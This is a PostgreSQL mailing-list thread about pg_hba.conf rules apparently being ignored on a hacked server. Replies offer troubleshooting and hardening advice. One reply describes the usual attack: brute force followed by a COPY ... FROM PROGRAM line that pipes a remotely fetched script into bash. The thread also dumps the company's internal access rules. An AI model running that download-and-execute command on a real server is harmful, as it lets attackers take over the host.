How to confirm the pg_hba.conf service is correctly working
Hello all
A while ago, our company had an Postgres DB that was Hacked login db to
modify data
found that pg_hba.conf is not work
Any ip, user can log in to DB
1. The rules in pg_hba.conf are almost invalid
2. pg_hba.conf is only useful for METHOD = trust
3. check SHOW hba_file; the file location is correct
4. select * from pg_hba_file_rules; checked is correct
5.DB version : PostgreSQL 10.19 on x86_64-pc-linux-gnu, compiled by gcc
(GCC) 4.8.5 20150623 (Red Hat 4.8.5-44), 64-bit
Even if you delete the text in pg_hba.conf
Keep only
host VJ VJ_USER 10.10.10.1/32 md5
After pg_ctl reload and Restart DB , any ip, user still can log in to DB
Please help how to check whether the pg_hba.conf service is defective
If you need any information, I will provide it
Thanks
shing dong <s7eqs7eq@gmail.com> writes:
1. The rules in pg_hba.conf are almost invalid
2. pg_hba.conf is only useful for METHOD = trust
3. check SHOW hba_file; the file location is correct
4. select * from pg_hba_file_rules; checked is correct
5.DB version : PostgreSQL 10.19 on x86_64-pc-linux-gnu, compiled by gcc
(GCC) 4.8.5 20150623 (Red Hat 4.8.5-44), 64-bit
Even if you delete the text in pg_hba.conf
Keep only
host VJ VJ_USER 10.10.10.1/32 md5
After pg_ctl reload and Restart DB , any ip, user still can log in to DB
It's hard to say where your mistake is, but probably the first
thing to check is whether you're really restarting the postmaster.
I'm wondering in particular if there's more than one PG instance
on the machine and you're reconfiguring or restarting the wrong
one. Other than that, retrace your steps carefully, because at
least one of the above statements must be wrong.
(I guess if you were feeling *really* paranoid, you could wonder
whether somebody replaced your postmaster executable with a hacked
version that doesn't apply any pg_hba checks. But pilot error
seems like a far more probable explanation.)
regards, tom lane
*DEAR TOM*
just one PG instance in host
I did an experiment
When I remove pg and reinstall pg, the function of pg_hba is working
,represent that the location of pg_hba is right
----- remove
yum remove postgresql*
--- install
yum -y install
https://download.postgresql.org/pub/repos/yum/reporpms/EL-7-x86_64/pgdg-redhat-repo-latest.noarch.rpmyum install postgresql10 postgresql10-server postgresql10-contrib
postgresql10-libs postgresql10-dev* -y
-----------
I have Check again the content of pg_hba.conf and "select * from
pg_hba_file_rules" consistent
Yes, this question is very tricky
Tom Lane <tgl@sss.pgh.pa.us> 於 2021年12月21日 週二 下午10:42寫道:
Show quoted text
shing dong <s7eqs7eq@gmail.com> writes:
1. The rules in pg_hba.conf are almost invalid
2. pg_hba.conf is only useful for METHOD = trust
3. check SHOW hba_file; the file location is correct
4. select * from pg_hba_file_rules; checked is correct
5.DB version : PostgreSQL 10.19 on x86_64-pc-linux-gnu, compiled by gcc
(GCC) 4.8.5 20150623 (Red Hat 4.8.5-44), 64-bit
Even if you delete the text in pg_hba.conf
Keep only
host VJ VJ_USER 10.10.10.1/32 md5
After pg_ctl reload and Restart DB , any ip, user still can log in toDB
It's hard to say where your mistake is, but probably the first
thing to check is whether you're really restarting the postmaster.
I'm wondering in particular if there's more than one PG instance
on the machine and you're reconfiguring or restarting the wrong
one. Other than that, retrace your steps carefully, because at
least one of the above statements must be wrong.(I guess if you were feeling *really* paranoid, you could wonder
whether somebody replaced your postmaster executable with a hacked
version that doesn't apply any pg_hba checks. But pilot error
seems like a far more probable explanation.)regards, tom lane
Please don't top post; the convention here is to inline or bottom post and
trim unnecessary quoting.
On Tue, Dec 21, 2021 at 9:24 PM shing dong <s7eqs7eq@gmail.com> wrote:
----- remove
yum remove postgresql*--- install yum -y install https://download.postgresql.org/pub/repos/yum/reporpms/EL-7-x86_64/pgdg-redhat-repo-latest.noarch.rpmyum install postgresql10 postgresql10-server postgresql10-contrib
postgresql10-libs postgresql10-dev* -y
Frankly, if you did this and you are still seeing errors, start over on a
fresh, never hacked, machine. Test that the new machine is secure then
restore your backup into it.
-----------
I have Check again the content of pg_hba.conf and "select * from
pg_hba_file_rules" consistent
If you want to continue having a public debugging session (on the problem
machine) I suggest that you perform all queries and inspect all files using
a terminal and then provide, with some light editing only, a copy of the
terminal transcript for evaluation.
You may wish to stand up a clean machine (VM or otherwise) for debugging,
just to ensure that your experiments produce the expected results.
David J.
On Tue, 21 Dec 2021 at 22:57, shing dong <s7eqs7eq@gmail.com> wrote:
*Dear Dave *
The result after reload is
2021-12-21 23:02:43.829 -04,,,36848,,61bf6ecf.8ff0,9,,2021-12-19 13:41:35
-04,,0,LOG,00000,"received SIGHUP, reloading configuration files",,,,,,,,,""No other error message
------------------------------------------
result of select * from pg_hba_file_rules
line_number,type,database,user_name,address,netmask,auth_method,options,error
84,local,{all},{all},,,md5,,
86,host,{all},{all},127.0.0.1,255.255.255.255,md5,,
87,host,{replication},{replica},127.0.0.1,255.255.255.255,md5,,
88,host,{replication},{replica},10.34.21.85,255.255.255.255,md5,,
89,host,{replication},{repl},10.37.12.13,255.255.255.255,md5,,
92,host,{product},{querysysuser},13.75.66.131,255.255.255.255,md5,,
93,host,{product},{collector},10.32.61.98,255.255.255.255,md5,,
94,host,{product},{collector_new},10.34.61.98,255.255.255.255,md5,,95,host,{product},"{collector,collector_new}",10.34.61.99,255.255.255.255,md5,,
96,host,{product},{MylIZ8UUIFO7KZBh1hXEnCPHqugzAm},10.21.99.177,255.255.255.255,md5,,
99,host,{product},{product_member},10.33.132.41,255.255.255.255,md5,,
100,host,{product},{product_member},10.33.132.42,255.255.255.255,md5,,
101,host,{product},{product_member},10.33.132.43,255.255.255.255,md5,,
102,host,{product},{product_member},10.33.132.44,255.255.255.255,md5,,
103,host,{product},{product_member},10.33.132.45,255.255.255.255,md5,,
104,host,{product},{product_member},10.33.132.51,255.255.255.255,md5,,
105,host,{product},{product_member},10.33.132.52,255.255.255.255,md5,,
106,host,{product},{product_member},10.33.132.53,255.255.255.255,md5,,
107,host,{product},{product_member},10.33.132.54,255.255.255.255,md5,,
108,host,{product},{product_member},10.33.132.55,255.255.255.255,md5,,
109,host,{product},{product_member},10.33.132.61,255.255.255.255,md5,,
110,host,{product},{product_member},10.33.132.62,255.255.255.255,md5,,
111,host,{product},{product_member},10.33.132.63,255.255.255.255,md5,,
112,host,{product},{product_member},10.33.132.64,255.255.255.255,md5,,
113,host,{product},{product_member},10.33.132.65,255.255.255.255,md5,,
114,host,{product},{product_member},10.34.32.41,255.255.255.255,md5,,
115,host,{product},{product_member},10.34.32.42,255.255.255.255,md5,,
116,host,{product},{product_member},10.34.32.43,255.255.255.255,md5,,
117,host,{product},{product_member},10.34.32.44,255.255.255.255,md5,,
118,host,{product},{product_member},10.34.32.45,255.255.255.255,md5,,
119,host,{product},{product_member},10.34.32.46,255.255.255.255,md5,,
120,host,{product},{product_member},10.34.32.51,255.255.255.255,md5,,
121,host,{product},{product_member},10.34.32.52,255.255.255.255,md5,,
122,host,{product},{product_member},10.34.32.53,255.255.255.255,md5,,
123,host,{product},{product_member},10.34.32.54,255.255.255.255,md5,,
124,host,{product},{product_member},10.34.32.55,255.255.255.255,md5,,
125,host,{product},{product_member},10.34.32.56,255.255.255.255,md5,,
126,host,{product},{product_member},10.34.32.61,255.255.255.255,md5,,
127,host,{product},{product_member},10.34.32.62,255.255.255.255,md5,,
128,host,{product},{product_member},10.34.32.63,255.255.255.255,md5,,
129,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
130,host,{product},{product_member},10.34.32.65,255.255.255.255,md5,,
131,host,{product},{product_member},10.34.32.66,255.255.255.255,md5,,
132,host,{product},{product_member},10.34.32.57,255.255.255.255,md5,,
133,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
135,host,{product},{product_agent},10.34.32.21,255.255.255.255,md5,,
136,host,{product},{product_agent},10.34.32.22,255.255.255.255,md5,,
137,host,{product},{product_agent},10.34.32.23,255.255.255.255,md5,,
138,host,{product},{product_agent},10.34.32.31,255.255.255.255,md5,,
139,host,{product},{product_agent},10.34.32.32,255.255.255.255,md5,,
140,host,{product},{product_agent},10.34.32.33,255.255.255.255,md5,,
141,host,{product},{product_agent},10.34.32.34,255.255.255.255,md5,,
142,host,{product},{product_agent},10.34.32.35,255.255.255.255,md5,,
143,host,{product},{product_agent},10.34.32.36,255.255.255.255,md5,,
144,host,{product},{product_agent},10.34.32.37,255.255.255.255,md5,,
145,host,{product},{product_agent},10.34.32.38,255.255.255.255,md5,,
146,host,{product},{product_agent},10.33.132.21,255.255.255.255,md5,,
147,host,{product},{product_agent},10.33.132.31,255.255.255.255,md5,,
148,host,{product},{product_agent},10.33.132.32,255.255.255.255,md5,,
149,host,{product},{product_agent},10.33.132.33,255.255.255.255,md5,,
150,host,{product},{product_agent},10.33.132.34,255.255.255.255,md5,,
153,host,{product},{product_dba},10.20.16.101,255.255.255.255,md5,,
154,host,{product},{product_dba},10.20.16.102,255.255.255.255,md5,,
155,host,{product},{product_dba},10.20.16.103,255.255.255.255,md5,,
156,host,{product},{product_dba},10.20.16.104,255.255.255.255,md5,,
157,host,{product},{product_dba},10.20.16.105,255.255.255.255,md5,,
161,host,{product},{dbcheck},10.34.21.118,255.255.255.255,md5,,
165,host,{product},{product_dba},10.3.10.2,255.255.255.255,md5,,
168,host,{product},{product_dba},10.3.10.13,255.255.255.255,md5,,
Hmmm for some reason I did not reply to the list.
At any rate.
Your original post stated that you only had
host VJ VJ_USER 10.10.10.1/32 md5
in the pg_hba.conf file.
However the result of the select is considerably more ?
Dave Cramer
Show quoted text
Import Notes
Reply to msg id not found: CAEJor10SVin=kXbzCTxhUoWLdzyWBqzBr_3C-P-QumQPz=TJUg@mail.gmail.com
Your original post stated that you only had
host VJ VJ_USER 10.10.10.1/32 md5
in the pg_hba.conf file.
However the result of the select is considerably more ?
DEAR
I have tested this feature , only had
host VJ VJ_USER 10.10.10.1/32 md5
in the pg_hba.conf file
Have checked select * from pg_hba_file_rules results are consistent with
pg_hba.conf
any ip and user still can login in db
When I remove pg software and reinstall pg software , the function of
pg_hba is working ,represent that the location and content of pg_hba.conf
are correct
Suspect that the function of pg_hba is destroyed?
Dave Cramer <davecramer@postgres.rocks> 於 2021年12月22日 週三 下午6:58寫道:
Show quoted text
On Tue, 21 Dec 2021 at 22:57, shing dong <s7eqs7eq@gmail.com> wrote:
*Dear Dave *
The result after reload is
2021-12-21 23:02:43.829 -04,,,36848,,61bf6ecf.8ff0,9,,2021-12-19 13:41:35
-04,,0,LOG,00000,"received SIGHUP, reloading configuration files",,,,,,,,,""No other error message
------------------------------------------
result of select * from pg_hba_file_rules
line_number,type,database,user_name,address,netmask,auth_method,options,error
84,local,{all},{all},,,md5,,
86,host,{all},{all},127.0.0.1,255.255.255.255,md5,,
87,host,{replication},{replica},127.0.0.1,255.255.255.255,md5,,
88,host,{replication},{replica},10.34.21.85,255.255.255.255,md5,,
89,host,{replication},{repl},10.37.12.13,255.255.255.255,md5,,
92,host,{product},{querysysuser},13.75.66.131,255.255.255.255,md5,,
93,host,{product},{collector},10.32.61.98,255.255.255.255,md5,,
94,host,{product},{collector_new},10.34.61.98,255.255.255.255,md5,,95,host,{product},"{collector,collector_new}",10.34.61.99,255.255.255.255,md5,,
96,host,{product},{MylIZ8UUIFO7KZBh1hXEnCPHqugzAm},10.21.99.177,255.255.255.255,md5,,
99,host,{product},{product_member},10.33.132.41,255.255.255.255,md5,,
100,host,{product},{product_member},10.33.132.42,255.255.255.255,md5,,
101,host,{product},{product_member},10.33.132.43,255.255.255.255,md5,,
102,host,{product},{product_member},10.33.132.44,255.255.255.255,md5,,
103,host,{product},{product_member},10.33.132.45,255.255.255.255,md5,,
104,host,{product},{product_member},10.33.132.51,255.255.255.255,md5,,
105,host,{product},{product_member},10.33.132.52,255.255.255.255,md5,,
106,host,{product},{product_member},10.33.132.53,255.255.255.255,md5,,
107,host,{product},{product_member},10.33.132.54,255.255.255.255,md5,,
108,host,{product},{product_member},10.33.132.55,255.255.255.255,md5,,
109,host,{product},{product_member},10.33.132.61,255.255.255.255,md5,,
110,host,{product},{product_member},10.33.132.62,255.255.255.255,md5,,
111,host,{product},{product_member},10.33.132.63,255.255.255.255,md5,,
112,host,{product},{product_member},10.33.132.64,255.255.255.255,md5,,
113,host,{product},{product_member},10.33.132.65,255.255.255.255,md5,,
114,host,{product},{product_member},10.34.32.41,255.255.255.255,md5,,
115,host,{product},{product_member},10.34.32.42,255.255.255.255,md5,,
116,host,{product},{product_member},10.34.32.43,255.255.255.255,md5,,
117,host,{product},{product_member},10.34.32.44,255.255.255.255,md5,,
118,host,{product},{product_member},10.34.32.45,255.255.255.255,md5,,
119,host,{product},{product_member},10.34.32.46,255.255.255.255,md5,,
120,host,{product},{product_member},10.34.32.51,255.255.255.255,md5,,
121,host,{product},{product_member},10.34.32.52,255.255.255.255,md5,,
122,host,{product},{product_member},10.34.32.53,255.255.255.255,md5,,
123,host,{product},{product_member},10.34.32.54,255.255.255.255,md5,,
124,host,{product},{product_member},10.34.32.55,255.255.255.255,md5,,
125,host,{product},{product_member},10.34.32.56,255.255.255.255,md5,,
126,host,{product},{product_member},10.34.32.61,255.255.255.255,md5,,
127,host,{product},{product_member},10.34.32.62,255.255.255.255,md5,,
128,host,{product},{product_member},10.34.32.63,255.255.255.255,md5,,
129,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
130,host,{product},{product_member},10.34.32.65,255.255.255.255,md5,,
131,host,{product},{product_member},10.34.32.66,255.255.255.255,md5,,
132,host,{product},{product_member},10.34.32.57,255.255.255.255,md5,,
133,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
135,host,{product},{product_agent},10.34.32.21,255.255.255.255,md5,,
136,host,{product},{product_agent},10.34.32.22,255.255.255.255,md5,,
137,host,{product},{product_agent},10.34.32.23,255.255.255.255,md5,,
138,host,{product},{product_agent},10.34.32.31,255.255.255.255,md5,,
139,host,{product},{product_agent},10.34.32.32,255.255.255.255,md5,,
140,host,{product},{product_agent},10.34.32.33,255.255.255.255,md5,,
141,host,{product},{product_agent},10.34.32.34,255.255.255.255,md5,,
142,host,{product},{product_agent},10.34.32.35,255.255.255.255,md5,,
143,host,{product},{product_agent},10.34.32.36,255.255.255.255,md5,,
144,host,{product},{product_agent},10.34.32.37,255.255.255.255,md5,,
145,host,{product},{product_agent},10.34.32.38,255.255.255.255,md5,,
146,host,{product},{product_agent},10.33.132.21,255.255.255.255,md5,,
147,host,{product},{product_agent},10.33.132.31,255.255.255.255,md5,,
148,host,{product},{product_agent},10.33.132.32,255.255.255.255,md5,,
149,host,{product},{product_agent},10.33.132.33,255.255.255.255,md5,,
150,host,{product},{product_agent},10.33.132.34,255.255.255.255,md5,,
153,host,{product},{product_dba},10.20.16.101,255.255.255.255,md5,,
154,host,{product},{product_dba},10.20.16.102,255.255.255.255,md5,,
155,host,{product},{product_dba},10.20.16.103,255.255.255.255,md5,,
156,host,{product},{product_dba},10.20.16.104,255.255.255.255,md5,,
157,host,{product},{product_dba},10.20.16.105,255.255.255.255,md5,,
161,host,{product},{dbcheck},10.34.21.118,255.255.255.255,md5,,
165,host,{product},{product_dba},10.3.10.2,255.255.255.255,md5,,
168,host,{product},{product_dba},10.3.10.13,255.255.255.255,md5,,Hmmm for some reason I did not reply to the list.
At any rate.
Your original post stated that you only had
host VJ VJ_USER 10.10.10.1/32 md5
in the pg_hba.conf file.
However the result of the select is considerably more ?
Dave Cramer
Have checked select * from pg_hba_file_rules results are consistent with
pg_hba.conf
any ip and user still can login in db
Any proxy? port/ip - forwarding running in the background?
in the next time check the "client_addr".
- SELECT usename, client_addr FROM pg_stat_activity where client_addr is
not null ;
a Postgres DB that was Hacked l
When I remove pg software and reinstall pg software
I agree with others;
- please re-install the full system! ( not just the PostgreSQL! )
Usually, the attack sequence:
- open port, brute force attack + COPY ... FROM PROGRAM 'curl
http://1xx.1x.7x.1/1.sh | bash';
so you can expect "anything" installed and running hidden in the background.
https://dev.to/sanchitsharma/investigation-into-postgres-malware-hack-2ai0
(2020.Mar
)
https://brycematheson.io/how-to-permanently-kill-and-remove-kdevtmpfsi-kinsing/
host VJ VJ_USER 10.10.10.1/32 md5
imho:
- use different ports
- change "md5" to "scram-sha-256"
- maybe: add https://www.postgresql.org/docs/10/auth-delay.html
- for administrating use SSH tunnels:
https://www.postgresql.org/docs/10/ssh-tunnels.html ( and use a firewall -
for closing all external ports or use SSL )
Regards,
Imre
shing dong <s7eqs7eq@gmail.com> ezt írta (időpont: 2021. dec. 23., Cs,
11:15):
Show quoted text
Your original post stated that you only had
host VJ VJ_USER 10.10.10.1/32 md5
in the pg_hba.conf file.
However the result of the select is considerably more ?DEAR
I have tested this feature , only had
host VJ VJ_USER 10.10.10.1/32 md5
in the pg_hba.conf file
Have checked select * from pg_hba_file_rules results are consistent with
pg_hba.confany ip and user still can login in db
When I remove pg software and reinstall pg software , the function of
pg_hba is working ,represent that the location and content of
pg_hba.conf are correctSuspect that the function of pg_hba is destroyed?
Dave Cramer <davecramer@postgres.rocks> 於 2021年12月22日 週三 下午6:58寫道:
On Tue, 21 Dec 2021 at 22:57, shing dong <s7eqs7eq@gmail.com> wrote:
*Dear Dave *
The result after reload is
2021-12-21 23:02:43.829 -04,,,36848,,61bf6ecf.8ff0,9,,2021-12-19
13:41:35 -04,,0,LOG,00000,"received SIGHUP, reloading configuration
files",,,,,,,,,""No other error message
------------------------------------------
result of select * from pg_hba_file_rules
line_number,type,database,user_name,address,netmask,auth_method,options,error
84,local,{all},{all},,,md5,,
86,host,{all},{all},127.0.0.1,255.255.255.255,md5,,
87,host,{replication},{replica},127.0.0.1,255.255.255.255,md5,,
88,host,{replication},{replica},10.34.21.85,255.255.255.255,md5,,
89,host,{replication},{repl},10.37.12.13,255.255.255.255,md5,,
92,host,{product},{querysysuser},13.75.66.131,255.255.255.255,md5,,
93,host,{product},{collector},10.32.61.98,255.255.255.255,md5,,
94,host,{product},{collector_new},10.34.61.98,255.255.255.255,md5,,95,host,{product},"{collector,collector_new}",10.34.61.99,255.255.255.255,md5,,
96,host,{product},{MylIZ8UUIFO7KZBh1hXEnCPHqugzAm},10.21.99.177,255.255.255.255,md5,,
99,host,{product},{product_member},10.33.132.41,255.255.255.255,md5,,
100,host,{product},{product_member},10.33.132.42,255.255.255.255,md5,,
101,host,{product},{product_member},10.33.132.43,255.255.255.255,md5,,
102,host,{product},{product_member},10.33.132.44,255.255.255.255,md5,,
103,host,{product},{product_member},10.33.132.45,255.255.255.255,md5,,
104,host,{product},{product_member},10.33.132.51,255.255.255.255,md5,,
105,host,{product},{product_member},10.33.132.52,255.255.255.255,md5,,
106,host,{product},{product_member},10.33.132.53,255.255.255.255,md5,,
107,host,{product},{product_member},10.33.132.54,255.255.255.255,md5,,
108,host,{product},{product_member},10.33.132.55,255.255.255.255,md5,,
109,host,{product},{product_member},10.33.132.61,255.255.255.255,md5,,
110,host,{product},{product_member},10.33.132.62,255.255.255.255,md5,,
111,host,{product},{product_member},10.33.132.63,255.255.255.255,md5,,
112,host,{product},{product_member},10.33.132.64,255.255.255.255,md5,,
113,host,{product},{product_member},10.33.132.65,255.255.255.255,md5,,
114,host,{product},{product_member},10.34.32.41,255.255.255.255,md5,,
115,host,{product},{product_member},10.34.32.42,255.255.255.255,md5,,
116,host,{product},{product_member},10.34.32.43,255.255.255.255,md5,,
117,host,{product},{product_member},10.34.32.44,255.255.255.255,md5,,
118,host,{product},{product_member},10.34.32.45,255.255.255.255,md5,,
119,host,{product},{product_member},10.34.32.46,255.255.255.255,md5,,
120,host,{product},{product_member},10.34.32.51,255.255.255.255,md5,,
121,host,{product},{product_member},10.34.32.52,255.255.255.255,md5,,
122,host,{product},{product_member},10.34.32.53,255.255.255.255,md5,,
123,host,{product},{product_member},10.34.32.54,255.255.255.255,md5,,
124,host,{product},{product_member},10.34.32.55,255.255.255.255,md5,,
125,host,{product},{product_member},10.34.32.56,255.255.255.255,md5,,
126,host,{product},{product_member},10.34.32.61,255.255.255.255,md5,,
127,host,{product},{product_member},10.34.32.62,255.255.255.255,md5,,
128,host,{product},{product_member},10.34.32.63,255.255.255.255,md5,,
129,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
130,host,{product},{product_member},10.34.32.65,255.255.255.255,md5,,
131,host,{product},{product_member},10.34.32.66,255.255.255.255,md5,,
132,host,{product},{product_member},10.34.32.57,255.255.255.255,md5,,
133,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
135,host,{product},{product_agent},10.34.32.21,255.255.255.255,md5,,
136,host,{product},{product_agent},10.34.32.22,255.255.255.255,md5,,
137,host,{product},{product_agent},10.34.32.23,255.255.255.255,md5,,
138,host,{product},{product_agent},10.34.32.31,255.255.255.255,md5,,
139,host,{product},{product_agent},10.34.32.32,255.255.255.255,md5,,
140,host,{product},{product_agent},10.34.32.33,255.255.255.255,md5,,
141,host,{product},{product_agent},10.34.32.34,255.255.255.255,md5,,
142,host,{product},{product_agent},10.34.32.35,255.255.255.255,md5,,
143,host,{product},{product_agent},10.34.32.36,255.255.255.255,md5,,
144,host,{product},{product_agent},10.34.32.37,255.255.255.255,md5,,
145,host,{product},{product_agent},10.34.32.38,255.255.255.255,md5,,
146,host,{product},{product_agent},10.33.132.21,255.255.255.255,md5,,
147,host,{product},{product_agent},10.33.132.31,255.255.255.255,md5,,
148,host,{product},{product_agent},10.33.132.32,255.255.255.255,md5,,
149,host,{product},{product_agent},10.33.132.33,255.255.255.255,md5,,
150,host,{product},{product_agent},10.33.132.34,255.255.255.255,md5,,
153,host,{product},{product_dba},10.20.16.101,255.255.255.255,md5,,
154,host,{product},{product_dba},10.20.16.102,255.255.255.255,md5,,
155,host,{product},{product_dba},10.20.16.103,255.255.255.255,md5,,
156,host,{product},{product_dba},10.20.16.104,255.255.255.255,md5,,
157,host,{product},{product_dba},10.20.16.105,255.255.255.255,md5,,
161,host,{product},{dbcheck},10.34.21.118,255.255.255.255,md5,,
165,host,{product},{product_dba},10.3.10.2,255.255.255.255,md5,,
168,host,{product},{product_dba},10.3.10.13,255.255.255.255,md5,,Hmmm for some reason I did not reply to the list.
At any rate.
Your original post stated that you only had
host VJ VJ_USER 10.10.10.1/32 md5
in the pg_hba.conf file.
However the result of the select is considerably more ?
Dave Cramer
On Thu, 23 Dec 2021 at 15:45, shing dong <s7eqs7eq@gmail.com> wrote:
I have tested this feature , only had
host VJ VJ_USER 10.10.10.1/32 md5
in the pg_hba.conf file
I may be a bit off , but can you try a couple of things, other than a fresh
install, incase you have time to debug more.
is it possible to snapshot the vm, and and set it up in a controlled
environment where you can play around with incoming connections at the
network layer
beyond the vm.
With that, is it possible for you to use gdb and debug a connection to the
postmaster.
you can setup using below,
Getting a stack trace of a running PostgreSQL backend on Linux/BSD -
PostgreSQL wiki
<https://wiki.postgresql.org/wiki/Getting_a_stack_trace_of_a_running_PostgreSQL_backend_on_Linux/BSD>
and then you can put a breakpoint at this function and check the input
lines it gets for parsing.
https://github.com/postgres/postgres/blob/6ab42ae36713b1e6f961c37e22f99d3e6267523b/src/backend/libpq/hba.c#L779
postgres/hba.c at 6ab42ae36713b1e6f961c37e22f99d3e6267523b ·
postgres/postgres (github.com)
<https://github.com/postgres/postgres/blob/6ab42ae36713b1e6f961c37e22f99d3e6267523b/src/backend/libpq/hba.c#L1438>
but maybe this helps identify why other ips are being allowed.
to be more paranoid, you can all reject from the ip you are trying to make
a connection, and trace that specific rule.
this might be an overkill and maybe a waste of effort given you already can
query the hba view, but incase you want to try out.